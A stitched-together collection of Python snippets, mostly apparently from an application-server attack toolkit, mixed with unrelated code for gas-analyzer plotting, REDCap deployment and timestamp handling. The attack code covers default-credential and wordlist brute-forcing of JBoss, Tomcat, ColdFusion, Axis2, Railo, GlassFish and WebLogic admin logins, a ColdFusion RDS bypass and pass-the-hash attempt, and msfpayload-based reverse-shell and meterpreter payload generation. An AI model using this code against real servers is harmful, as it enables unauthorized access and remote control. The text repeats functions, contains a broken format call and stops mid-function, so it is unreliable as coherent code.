def wf_reader(filename, **kwargs): header = kwargs.get('header', False) delim = kwargs.get('delimeter', None) import numpy as np import utility as ut datafile = open(filename, 'r') time, columns = [], [] for line in datafile: line = line.strip() if len(line.split(delim)) >= 2: time.append(line.split(delim)[1]) columns.append(line.split(delim)[2:]) datafile.close() if header == True: matrix = np.array(columns[1:], dtype='float') matrix = np.hstack((ut.timestamp(time[1:], t0=True), matrix)) return columns[0], matrix if header == False: matrix = np.array(columns, dtype='float') matrix = np.hstack((ut.timestamp(time, t0=True), matrix)) return matrix
def get_unix_timestamp(dt_str1, dt_str2): try: ts = utility.timestamp(dt_str1) return ts except Exception as err: if str(err).find('must be in -1439') != -1: new_dt1 = replace_TZ(dt_str1, dt_str2) try: ts = utility.timestamp(new_dt1) return ts except Exception as err: fix_invalid_date(new_dt1) else: fix_invalid_date(dt_str1)
def define_env(settings_file_path=""): """ This function sets up some global variables """ # Set defaults env.deploy_redcap_cron = False # first, copy the secrets file into the deploy directory if os.path.exists(settings_file_path): config.read(settings_file_path) else: print(("The secrets file path cannot be found. It is set to: %s" % settings_file_path)) abort("Secrets File not set") utility.get_config('deploy_user', settings_file_path) section="instance" for (name,value) in config.items(section): env[name] = value # Set variables that do not have corresponding values in vagrant.ini file time = utility.timestamp() env.remote_project_name = '%s-%s' % (env.project_path,time) env.live_project_full_path = env.live_pre_path + "/" + env.project_path env.backup_project_full_path = env.backup_pre_path + "/" + env.project_path env.upload_project_full_path = env.backup_pre_path env.hosts = [env.host] env.port = env.host_ssh_port # Turn deploy_redcap_cron into a boolean env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
def waitServe(servert): """ Small function used to wait for a _serve thread to receive a GET request. See _serve for more information. servert should be a running thread. """ timeout = 10 status = False try: while servert.is_alive() and timeout > 0: stdout.flush() stdout.write("\r\033[32m [%s] Waiting for remote server to " "download file [%ds]" % (utility.timestamp(), timeout)) sleep(1.0) timeout -= 1 except: timeout = 0 if timeout != 10: print('') if timeout == 0: utility.Msg("Remote server failed to retrieve file.", LOG.ERROR) else: status = True return status
def define_env(settings_file_path=""): """ This function sets up some global variables """ # Set defaults env.deploy_redcap_cron = False # first, copy the secrets file into the deploy directory if os.path.exists(settings_file_path): config.read(settings_file_path) else: print("The secrets file path cannot be found. It is set to: %s" % settings_file_path) abort("Secrets File not set") if utility.get_config('deploy_user', settings_file_path) != "": env.user = utility.get_config('deploy_user', settings_file_path) section = "instance" for (name, value) in config.items(section): env[name] = value # Set variables that do not have corresponding values in vagrant.ini file time = utility.timestamp() env.remote_project_name = '%s-%s' % (env.project_path, time) env.live_project_full_path = env.live_pre_path + "/" + env.project_path env.backup_project_full_path = env.backup_pre_path + "/" + env.project_path env.upload_project_full_path = env.backup_pre_path env.hosts = [env.host] env.port = env.host_ssh_port # Turn deploy_redcap_cron into a boolean env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
def waitServe(servert): """ Small function used to wait for a _serve thread to receive a GET request. See _serve for more information. servert should be a running thread. """ timeout = 10 status = False try: while servert.is_alive() and timeout > 0: stdout.flush() stdout.write("\r\033[32m [%s] Waiting for remote server to " "download file [%ds]" % (utility.timestamp(), timeout)) sleep(1.0) timeout -= 1 except: timeout = 0 if timeout is not 10: print '' if timeout is 0: utility.Msg("Remote server failed to retrieve file.", LOG.ERROR) else: status = True return status
def checkAuth(ip, port, title): """ """ if title == GINTERFACES.GAD: url = 'http://{0}:{1}/management/domain'.format(ip, port) # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') return _auth(usr, pswd, url) # else try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url) if cook: return cook # check for a supplied wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, "r") as f: wordlist = [ x.decode("ascii", "ignore").rstrip() for x in f.readlines() ] utility.Msg( "Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write( "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" % (utility.timestamp(), state.bf_user, idx + 1, len(wordlist))) cook = _auth(state.bf_user, word, url) if cook: print('') if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg( "Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print('') except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version): """ """ url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port) # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') return _auth(usr, pswd, url, version) # else try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # if we're still here, check if they supplied a wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] try: with open(state.bf_wordlist, 'r') as f: # ensure everything is ascii or requests will explode wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()] except Exception, e: utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR) return utility.Msg("Brute forcing account %s with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print '' # newline if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version): """ """ url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port) if state.usr_auth: (usr, pswd) = state.usr_auth.split(":") return _auth(usr, pswd, url, version) # try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # bruteforce if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, 'r') as f: # ensure its all ascii wordlist = [ x.decode('ascii', 'ignore').rstrip() for x in f.readlines() ] utility.Msg( "Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print '' # newline if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version): """ """ if title == TINTERFACES.MAN: url = "http://{0}:{1}/manager/html".format(ip, port) # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(":") return _auth(usr, pswd, url) # else try default credentials for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url) if cook: return cook # if we're still here, check if they supplied a wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, "r") as f: wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()] utility.Msg("Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url) if cook: print '' # lets insert these credentials to the default list so we # don't need to bruteforce it each time if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title): """ Railo doesn't have usernames, so we only care about passwords """ url = None if title is RINTERFACES.WEB: url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port) elif title is RINTERFACES.SRV: url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port) else: utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG) return if state.usr_auth: # check with given auth; handle both cases of "default" and ":default" if ':' in state.usr_auth: (_, pswd) = state.usr_auth.split(":") else: pswd = state.usr_auth return _auth(pswd, url, title) if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, "r") as f: wordlist = [ x.decode("ascii", "ignore").rstrip() for x in f.readlines() ] utility.Msg( "Brute forcing %s with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write( "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" % (utility.timestamp(), state.bf_user, idx + 1, len(wordlist))) cook = _auth(word, url, title) if cook: print '' utility.Msg("Successful login with %s" % word, LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title): """ """ if title == GINTERFACES.GAD: url = 'http://{0}:{1}/management/domain'.format(ip, port) # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') return _auth(usr, pswd, url) # else try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url) if cook: return cook # check for a supplied wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, "r") as f: wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()] utility.Msg("Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url) if cook: print '' if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version): """ """ url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port) if state.usr_auth: (usr, pswd) = state.usr_auth.split(":") return _auth(usr, pswd, url, version) # try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # bruteforce if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, 'r') as f: # ensure its all ascii wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()] utility.Msg("Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print '' # newline if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def backup_database(options=""): """ Backup a mysql database from the remote host with mysqldump options in *options*. The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz' The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz' """ utility.write_remote_my_cnf() now = utility.timestamp() with settings(user=env.deploy_user): run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \ (options, env.database_user, env.database_host, env.database_name, env.instance_name, now)) run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" % (env.instance_name, now, env.instance_name)) utility.delete_remote_my_cnf()
def run(options): """ This module is used for generating reverse shell payloads. It's not flexible in what sorts of payloads it can generate, but this is by design. Highly customized payloads, or stuff like meterpreter/reverse java payloads should be generated using proper tools, such as msfpayload. This is merely a quick way for us to get a reverse shell on a remote system. """ if not options.remote_os: utility.Msg("Please specify a remote os (-o)", LOG.ERROR) return if not options.remote_service: utility.Msg("Please specify a remote service (-a)", LOG.ERROR) return elif options.remote_service in ["coldfusion"]: out = "R > shell.jsp" if getoutput("which msfpayload") == "": utility.Msg("This option requires msfpayload", LOG.ERROR) return payload = fetch_payload(options) out = "W > shell.war" if not payload: utility.Msg( "Platform %s unsupported" % fingerengine.options.remote_service, LOG.ERROR) return utility.Msg("Generating payload....") (lhost, lport) = options.generate_payload.split(":") resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" % (payload, lhost, lport, out)) if "Created by" in resp: utility.Msg("Payload generated (%s). Payload: %s" % (out.split(' ')[2], payload)) # also log some auxiliary information getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp()) getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport)) getoutput("echo %s >> ./src/lib/shell.log" % (payload)) else: utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def checkAuth(ip, port, title): """ Railo doesn't have usernames, so we only care about passwords """ url = None if title is RINTERFACES.WEB: url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port) elif title is RINTERFACES.SRV: url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port) else: utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG) return if state.usr_auth: # check with given auth; handle both cases of "default" and ":default" if ':' in state.usr_auth: (_, pswd) = state.usr_auth.split(":") else: pswd = state.usr_auth return _auth(pswd, url, title) if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, "r") as f: wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()] utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(word, url, title) if cook: print '' utility.Msg("Successful login with %s" % word, LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def run(options): """ This module is used for generating reverse shell payloads. It's not flexible in what sorts of payloads it can generate, but this is by design. Highly customized payloads, or stuff like meterpreter/reverse java payloads should be generated using proper tools, such as msfpayload. This is merely a quick way for us to get a reverse shell on a remote system. """ PAYLOAD = "java/jsp_shell_reverse_tcp" if not options.remote_service: utility.Msg("Please specify a remote service (-a)", LOG.ERROR) return elif options.remote_service in ["coldfusion"]: out = "R > shell.jsp" else: out = "W > shell.war" if getoutput("which msfpayload") == "": utility.Msg("This option requires msfpayload", LOG.ERROR) return utility.Msg("Generating payload....") (lhost, lport) = options.generate_payload.split(":") resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" % (PAYLOAD, lhost, lport, out)) if "Created by" in resp: utility.Msg("Payload generated (%s). Payload: %s" % (out.split(' ')[2], PAYLOAD)) # also log some auxiliary information getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp()) getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport)) getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD)) else: utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def get_unix_timestamp(dt_str): try: ts = utility.timestamp(dt_str) return ts except Exception as err: fix_invalid_date(dt_str)
def fix_invalid_date(dt_str): # handle datetime with wrong TZ or date older than 1970-01-01 try: return utility.timestamp(dt_str[:19] + '+00:00') except Exception as err: return utility.timestamp('1970-01-01T00:00:00+00:00')
def checkAuth(ip, port, title, version): """ """ if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM: for (usr, pswd) in default_credentials: url = "http://%s:%s/admin-console/login.seam" % (ip, port) data = OrderedDict([ ("login_form", "login_form"), ("login_form:name", usr), ("login_form:password", pswd), ("login_form:submit", "Login"), ("javax.faces.ViewState", utility.fetch_viewState(url)), ]) response = utility.requests_post(url, data=data) if response.status_code == 200: utility.Msg( "Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG) if version in ["5.1"]: return (dict_from_cookiejar(response.history[0].cookies), None) return (dict_from_cookiejar(response.cookies), None) else: if title is JINTERFACES.JMX: url = "http://%s:%s/jmx-console/" % (ip, port) elif title is JINTERFACES.MM: url = "http://%s:%s/management" % (ip, port) elif title is JINTERFACES.WC: url = "http://%s:%s/web-console" % (ip, port) else: utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG) return # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') return _auth(usr, pswd, url, version) # else try default credentials for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # if we're still here, check if they supplied a wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, 'r') as f: # ensure everything is ascii or requests will explode wordlist = [ x.decode("ascii", "ignore").rstrip() for x in f.readlines() ] utility.Msg( "Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print('') # newline # lets insert these credentials to the default list so we # don't need to bruteforce it each time if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg( "Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print('') except KeyboardInterrupt: pass
# exploitation engine for the service utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service, LOG.DEBUG) # execute the auxiliary engine auxengine(fingerengine) if __name__ == "__main__": utility.header() options = parse(sys.argv[1:]) # set platform state.platform = platform.system().lower() utility.Msg("Started at %s" % (utility.timestamp())) # log the CLI args utility.log(' '.join(sys.argv)) try: prerun(options) if options.ip or options.input_list: run(options) postrun(options) except KeyboardInterrupt: pass utility.Msg("Finished at %s" % (utility.timestamp()))
def rga_plot(filepath, **kwargs): # Define keyword arguments chan2plot = kwargs.get('chan2plot', 'all') bounds = kwargs.get('bounds', 'full') yscale = kwargs.get('yscale', 'linear') tag = kwargs.get('tag', '') o = kwargs.get('overlay', False) col = kwargs.get('colors', 'default') style = kwargs.get('style', '-') date2 = kwargs.get('date', 'same') if date2 != 'same': date = date2 if date2 == 'same': date = date_g # Import modules import numpy as np import matplotlib.pyplot as plt import utility as ut # Get the data from the file using rga_read species, p_data = rga_read(filepath, date=date2) species, p_data = rga_read(filepath, date=date2) # Separate time and pressure data time = p_data[:, 0] p_data = p_data[:, 1:] dt = ut.avediff(time) # Deal with plotting bounds if bounds == 'full': bounds_s = [np.amin(time), np.amax(time)] bound_i = [0, len(time) - 1] # Convert time to seconds if bounds != 'full': bounds_s = ut.timestamp(bounds) # Find the index of the time closest to bounds bound_index = [] for k in range(2): j = -1 for i in time[1:]: j = j + 1 if i < bounds_s[k]: last_time = i else: a = abs(bounds_s[k] - last_time) b = abs(i - bounds_s[k]) if a > b: bound_index.append(j) break else: bound_index.append(j - 1) break bound_i = ut.bound_finder(time, bounds_s) # Deal with which channels to intt if chan2plot == 'all': chan2plot = species if chan2plot == 'AllXenon': chan2plot = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134'] # Plot the lines plt.figure('rga_plot') plt.clf() j = 0 figtext = '' for i in chan2plot: if i == 'Nitrogen': col = 'FireBrick' if i == 'Oxygen': col = 'Turquoise' if i == 'Hydrogen': col = 'Goldenrod' if i == 'CarbonDioxide': col = 'DarkGreen' if i == 'Water': col = 'MidnightBlue' if i == 'Xenon129': col = 'Violet' if i == 'Xenon131': col = 'DarkViolet' if i == 'Xenon132': col = 'DarkMagenta' if i == 'Xenon134': col = 'DarkSlateBlue' if i == 'Argon': col = 'DeepPink' if i == 'mass83': col = 'DodgerBlue' if i == 'Barium138': col = 'DodgerBlue' plt.plot(time[bound_i[0]:bound_i[1]], p_data[bound_i[0]:bound_i[1], species.index(i)], color=col, label=i) plt.xlim(time[bound_i[0]], time[bound_i[1]]) if yscale == 'log': ut.log() if yscale == 'linear': ut.sci() plt.xlabel('Time (s)') plt.ylabel('Partial Pressure (Torr)') plt.title(str(date) + ' pvt' + str(filepath)) plt.legend(fontsize=12) plt.show()
utility.Msg("Fingerprinting completed.", LOG.UPDATE) # We've got the host fingerprinted, now kick off the # exploitation engine for the service utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service, LOG.DEBUG) # execute the auxiliary engine auxengine(fingerengine) if __name__ == "__main__": utility.header() options = parse(sys.argv[1:]) utility.Msg("Started at %s" % (utility.timestamp())) # log the CLI args utility.log(' '.join(sys.argv)) try: prerun(options) if options.ip or options.input_list: run(options) postrun(options) except KeyboardInterrupt: pass utility.Msg("Finished at %s" % (utility.timestamp()))
def rga_int(filepath, bounds, **kwargs): # Define keyword arguments chan2int = kwargs.get('chan2int', 'all') yscale = kwargs.get('yscale', 'log') col = kwargs.get('colors', 'default') output = kwargs.get('store', False) pltsub = kwargs.get('plt_sub', False) bndtype = kwargs.get('boundtype', 'edge') # Import modules import numpy as np import matplotlib.pyplot as plt import utility as ut # Get the data from the file using rga_read species, p_data = rga_read(filepath) # Separate time and pressure data time = p_data[:, 0] p_data = p_data[:, 1:] dt = ut.avediff(time) # Convert time to seconds if type(bounds[0]) == str: bounds = ut.timestamp(bounds) if bndtype == 'front': bounds = [bounds[0], bounds[0] + bounds[1]] # Find the index of the time closest to bounds bound_i = ut.bound_finder(time, bounds) # Deal with which channels to integrate if chan2int == 'all': chan2int = species if chan2int == 'AllXenon': chan2int = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134'] # Integrate selected channels over bounds ints, bg = [], [] for i in chan2int: bg.append(np.mean(p_data[bound_i[0] - 20:bound_i[0], species.index(i)])) ints.append( np.sum(p_data[bound_i[0]:bound_i[1], species.index(i)]) - bg[-1]) # Plot the lines plt.figure('rga_int') plt.clf() j = 0 figtext = '' for i in chan2int: if i == 'Nitrogen': col = 'FireBrick' if i == 'Oxygen': col = 'Turquoise' if i == 'Hydrogen': col = 'Goldenrod' if i == 'CarbonDioxide': col = 'DarkGreen' if i == 'Water': col = 'MidnightBlue' if i == 'Xenon129': col = 'Violet' if i == 'Xenon131': col = 'DarkViolet' if i == 'Xenon132': col = 'DarkMagenta' if i == 'Xenon134': col = 'DarkSlateBlue' if i == 'Argon': col = 'DeepPink' if i == 'mass83': col = 'DodgerBlue' if pltsub == True: plt.plot(time[bound_i[0] - 10:bound_i[1] + 10], p_data[bound_i[0] - 10:bound_i[1] + 10, species.index(i)] - bg[j], color=col, label=i) if pltsub == False: plt.plot(time[bound_i[0] - 10:bound_i[1] + 10], p_data[bound_i[0] - 10:bound_i[1] + 10, species.index(i)], color=col, label=i) if j == 0: figtext += i + ': ' + ut.conv(ints[j]) + 'Torr' if j > 0: figtext += '\n' + i + ': ' + ut.conv(ints[j]) + 'Torr' j += 1 plt.xlim(time[bound_i[0] - 5], time[bound_i[1] + 5]) plt.axvline(bounds[0], color='black', ls='--') plt.axvline(bounds[1], color='black', ls='--') if yscale == 'log': ut.log() if yscale == 'linear': ut.sci() plt.xlabel('Time (s)') plt.ylabel('Partial Pressure (Torr)') plt.title(str(date) + ' RGA integral') ut.textbox(figtext, [.05, .95]) plt.legend() plt.show() if output == True: return ints
def checkAuth(ip, fingerprint, returnCookie = False): """ Default behavior is to simply return True/False based on whether or not authentication with the credentials was successful. If returnCookie is set to true, we return the required auth cookie. Returns a tuple of (usr, pswd) in the event of a success, otherwise (None, None) is returned. """ # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') auth = _auth(usr, pswd, ip, fingerprint) if auth: return auth # else try default credentials for (usr, pswd) in default_credentials: auth = _auth(usr, pswd, ip, fingerprint) if auth: return auth # if we're still here, lets check for a wordlist if state.bf_wordlist and not state.hasbf: # # by default, certain WebLogic servers have a lockout of 5 attempts # before a 30 minute lock. Lets confirm the user knows this. # tmp = utility.capture_input("WebLogic has a lockout after 5 attempts. Continue? [Y/n]") if 'n' in tmp: return (None, None) state.hasbf = True wordlist = [] try: with open(state.bf_wordlist, 'r') as f: wordlist = [x.decode('ascii', "ignore").rstrip() for x in f.readlines()] except Exception, e: utility.Msg(e, LOG.DEBUG) return (None, None) utility.Msg('Brute forcing %s account with %d passwords...' % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) auth = _auth(state.bf_user, word, ip, fingerprint) if auth: print '' # insert creds into default cred list if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return auth print '' except KeyboardInterrupt: pass
def checkAuth(ip, port, title, version): """ """ url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port) if version in ['5.0']: url = 'http://{0}:{1}/CFIDE/administrator/index.cfm'.format(ip, port) # check with given auth if state.usr_auth: if version in ['7.0', '8.0', '9.0'] and len(state.usr_auth) >= 40: # try pth cook = attemptPTH(url, state.usr_auth) if cook: return cook if ':' in state.usr_auth: (usr, pswd) = state.usr_auth.split(':') else: (usr, pswd) = "admin", state.usr_auth return _auth(usr, pswd, url, version) # else try default creds for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # if we're 9.x, we can use the RDS bypass if version in ["9.0"]: cook = attemptRDS(ip, port) if cook: return cook # if we're still here, check if they supplied a wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] try: with open(state.bf_wordlist, 'r') as f: # ensure everything is ascii or requests will explode wordlist = [ x.decode('ascii', 'ignore').rstrip() for x in f.readlines() ] except Exception, e: utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR) return utility.Msg( "Brute forcing account %s with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print '' # newline if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg( "Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
def run(options): """ This module is used for generating reverse shell payloads. It's not flexible in what sorts of payloads it can generate, but this is by design. Highly customized payloads, or stuff like meterpreter/reverse java payloads should be generated using proper tools, such as msfpayload. This is merely a quick way for us to get a reverse shell on a remote system. """ PAYLOAD = "java/jsp_shell_reverse_tcp" SHELL = "cmd.exe" if not options.remote_service: utility.Msg("Please specify a remote service (-a)", LOG.ERROR) return elif not options.remote_os: utility.Msg("Please specify a remote OS (-o)", LOG.ERROR) return elif options.remote_service in ["coldfusion"]: out = "R > shell.jsp" elif options.remote_service in ["axis2"]: PAYLOAD = "java/meterpreter/reverse_tcp" out = "R > shell.jar" else: out = "W > shell.war" if options.remote_os != "windows": SHELL = "/bin/bash" if getoutput("which msfpayload") == "": utility.Msg("This option requires msfpayload", LOG.ERROR) return utility.Msg("Generating payload....") (lhost, lport) = options.generate_payload.split(":") resp = getoutput("msfpayload %s LHOST=%s LPORT=%s SHELL=%s %s" % (PAYLOAD, lhost, lport, SHELL, out)) '''For axis2 payloads, we have to add a few things to the msfpayload output''' if (options.remote_service in ["axis2"]): services_xml = """<service name="shell" scope="application"> <description> Clusterd axis2 service </description> <messageReceivers> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-only" class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/> <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/> </messageReceivers> <parameter name="ServiceClass"> metasploit.PayloadServlet </parameter> </service>""" with ZipFile('shell.jar', 'a') as shellZip: shellZip.write("./src/lib/axis2/PayloadServlet.class", "metasploit/PayloadServlet.class") shellZip.writestr("META-INF/services.xml", services_xml) if len(resp) <= 1 or 'Created by' in resp: utility.Msg("Payload generated (%s). Payload: %s" % (out.split(' ')[2], PAYLOAD)) # also log some auxiliary information getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp()) getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport)) getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD)) else: utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def parse(arguments): """ Parse command line options """ parser = ArgumentParser(usage='./clusterd.py [options]') # # Connection related command line arguments # connection = parser.add_argument_group( "Connection", description='Options for configuring the connection') connection.add_argument("-i", help='Server address', action='store', dest='ip', metavar='[ip address]') connection.add_argument("-iL", help='Server list', action='store', dest='input_list', metavar='[file]') connection.add_argument('-p', help='Server port', action='store', dest='port', type=int, metavar='[port]') connection.add_argument('--proxy', help='Connect through proxy [http|https]', action='store', dest='proxy', metavar="[proxy://server:port]") connection.add_argument('--proxy-auth', help='Proxy credentials', action='store', dest='proxy_auth', metavar='[username:password]') connection.add_argument('--timeout', help='Connection timeout [%ds]' % state.timeout, action='store', dest='timeout', default=state.timeout, metavar='[seconds]') connection.add_argument("--random-agent", help='Use a random User-Agent for'\ ' requests', action='store_true', dest='random_agent', default=False) connection.add_argument("--ssl", help='Force SSL', action='store_true', dest='ssl', default=False) # # Remote host command line arguments # remote = parser.add_argument_group( 'Remote Host', description='Settings specific to the remote host') remote.add_argument('-a', help='Hint at remote host service', action='store', dest='remote_service', metavar='[%s]' % ('|'.join(state.supported_platforms))) remote.add_argument('-o', help='Hint at remote host OS', action='store', dest='remote_os', 